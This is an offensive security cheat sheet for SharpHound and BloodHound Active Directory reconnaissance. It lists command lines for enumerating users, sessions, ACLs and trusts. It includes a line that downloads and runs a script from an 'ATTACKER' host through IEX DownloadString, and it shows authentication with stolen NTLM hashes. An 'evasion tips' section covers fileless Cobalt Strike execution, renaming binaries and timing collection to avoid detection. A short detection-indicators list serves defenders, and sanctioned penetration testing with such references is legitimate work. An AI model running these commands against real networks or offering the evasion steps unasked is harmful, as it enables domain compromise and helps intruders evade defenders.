SHARPHOUND
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
SharpHound is the official data collector (ingestor) for BloodHound. Enumerates Active Directory relationships for attack path discovery.
OVERVIEW#
SharpHound collects AD data (users, groups, sessions, ACLs, trusts) and outputs JSON/ZIP files for import into BloodHound GUI. Versions: - SharpHound.exe: C# standalone binary - SharpHound.ps1: PowerShell version (imports SharpHound module) - BloodHound.py: Python remote collector (Linux/Kali)
BASIC COLLECTION#
# SharpHound.exe - Collect everything SharpHound.exe -c All # SharpHound.exe - Specific collection methods SharpHound.exe -c DCOnly # Domain controller data only SharpHound.exe -c Default # Group, Session, Trusts, ACL, ObjectProps SharpHound.exe -c Session # Session data only SharpHound.exe -c Group # Group memberships only SharpHound.exe -c ACL # ACL data only SharpHound.exe -c Trusts # Domain trusts SharpHound.exe -c ObjectProps # Object properties SharpHound.exe -c LocalAdmin # Local admin access SharpHound.exe -c LocalGroup # All local groups SharpHound.exe -c RDP # RDP access SharpHound.exe -c DCOM # DCOM access SharpHound.exe -c PSRemote # PS remoting access SharpHound.exe -c Container # Container (OU/GPO) data SharpHound.exe -c GPOLocalGroup # GPO-assigned local groups SharpHound.exe -c CertServices # AD CS (certificate services) # Combine collection methods SharpHound.exe -c Group,Session,ACL,Trusts SharpHound.exe -c Default,CertServices
POWERSHELL VERSION#
# Import module
Import-Module .\SharpHound.ps1
# Or reflective load
IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER/SharpHound.ps1')
# Run collection
Invoke-BloodHound -CollectionMethods All
Invoke-BloodHound -CollectionMethods DCOnly
Invoke-BloodHound -CollectionMethods Session -Loop -LoopDuration 02:00:00
BLOODHOUND.PY (REMOTE COLLECTION)#
# Install pip install bloodhound # Basic collection bloodhound-python -u 'user' -p 'password' -d domain.local -ns DC_IP -c All bloodhound-python -u 'user' -p 'password' -d domain.local -c DCOnly # With NTLM hash bloodhound-python -u 'user' --hashes :NTLM_HASH -d domain.local -c All # Kerberos auth bloodhound-python -u 'user' -p 'password' -d domain.local -c All -k --auth-method kerberos # Specify DNS bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.1 -c All # Output directory bloodhound-python -u 'user' -p 'password' -d domain.local -c All --zip -o ./output/
DOMAIN & TARGET OPTIONS#
# Target specific domain SharpHound.exe -c All -d child.domain.local # Target specific domain controller SharpHound.exe -c All --domaincontroller DC01.domain.local # Specify LDAP port SharpHound.exe -c All --ldapport 636 # LDAPS SharpHound.exe -c All --ldapport 3268 # Global Catalog # Alternate credentials SharpHound.exe -c All --ldapusername user --ldappassword pass # Search base (OU targeting) SharpHound.exe -c All --searchbase "OU=Servers,DC=domain,DC=local" # Computer file (target specific hosts) SharpHound.exe -c Session --computerfile targets.txt
OUTPUT OPTIONS#
# Output directory SharpHound.exe -c All --outputdirectory C:\Temp # Output prefix SharpHound.exe -c All --outputprefix engagement_name # ZIP output (default behavior) SharpHound.exe -c All --zipfilename bloodhound_data.zip # No ZIP (raw JSON files) SharpHound.exe -c All --nojson false --nozip # Encrypt ZIP SharpHound.exe -c All --encryptzip --zippassword P@ssw0rd # Pretty-print JSON SharpHound.exe -c All --prettyjson
SESSION LOOP COLLECTION#
# Continuous session collection (catches logged-in users over time) SharpHound.exe -c Session --loop --loopduration 02:00:00 SharpHound.exe -c Session --loop --loopduration 08:00:00 --loopinterval 00:05:00 # Session loop with other collection (first run All, then loop Sessions) SharpHound.exe -c All --loop --loopduration 04:00:00
STEALTH & OPSEC#
# Stealth mode (single-threaded, avoids noisy queries) SharpHound.exe -c All --stealth # Throttle requests (milliseconds between LDAP queries) SharpHound.exe -c All --throttle 1000 SharpHound.exe -c All --jitter 20 # Add jitter percentage # Limit concurrent threads SharpHound.exe -c All --threads 5 # Default is 50 # Skip ping check (useful when ICMP is blocked) SharpHound.exe -c All --skippincheck # Use LDAPS (encrypted LDAP) SharpHound.exe -c All --secureldap # Exclude domain controllers from session enum SharpHound.exe -c All --excludedcs # Randomize collection order SharpHound.exe -c All --randomfilenames # Cache file (resume interrupted collection) SharpHound.exe -c All --cachename mycache.bin SharpHound.exe -c All --invalidatecache # Force fresh collection
NETEXEC BLOODHOUND INTEGRATION#
# Collect BloodHound data via NetExec nxc ldap DC_IP -u user -p password --bloodhound --ns DC_IP -c All nxc ldap DC_IP -u user -H NTLM_HASH --bloodhound --ns DC_IP
COLLECTION METHOD REFERENCE#
Method What it Collects Noise Level ------ ------------------- ----------- All Everything below HIGH Default Group, Session, Trusts, ACL, ObjProps MEDIUM DCOnly Users, Groups, Trusts, ACLs (LDAP) LOW Session Active sessions (NetSessionEnum) MEDIUM LocalGroup Local group members (SAM-R/registry) HIGH Group AD group memberships LOW ACL DACLs/SACLs on AD objects LOW Trusts Domain and forest trusts LOW ObjectProps User/computer properties LOW Container OU and GPO links LOW CertServices Certificate templates, CAs, ESC paths LOW GPOLocalGroup GPO-defined local groups LOW RDP RDP access rights MEDIUM DCOM DCOM access rights MEDIUM PSRemote PS Remoting access rights MEDIUM LocalAdmin Local admin enumeration HIGH
DETECTION & INDICATORS#
- LDAP queries from non-DC sources (Event 1644 if enabled) - NetSessionEnum/NetLocalGroupEnum API calls - SAM-R queries for local group enumeration - High volume of LDAP queries in short timeframe - SharpHound binary on disk or in memory - Named pipes and RPC calls to multiple hosts - Process creation with SharpHound arguments
EVASION TIPS#
- Use DCOnly to minimize network noise (LDAP only, no SMB) - Run during business hours to blend with normal traffic - Use --stealth flag for single-threaded collection - Use bloodhound-python from Linux to avoid on-host detection - Use --throttle and --jitter to slow down queries - Reflectively load SharpHound.ps1 to avoid disk writes - Use Cobalt Strike execute-assembly for fileless execution - Rename SharpHound binary and randomize output filenames - Use LDAPS (port 636) to encrypt collection traffic - Collect in stages: DCOnly first, then targeted Session loops
IMPORTING DATA INTO BLOODHOUND#
1. Start Neo4j database 2. Launch BloodHound GUI 3. Click "Upload Data" (or drag-and-drop ZIP) 4. Wait for ingestion to complete 5. Run pre-built queries or custom Cypher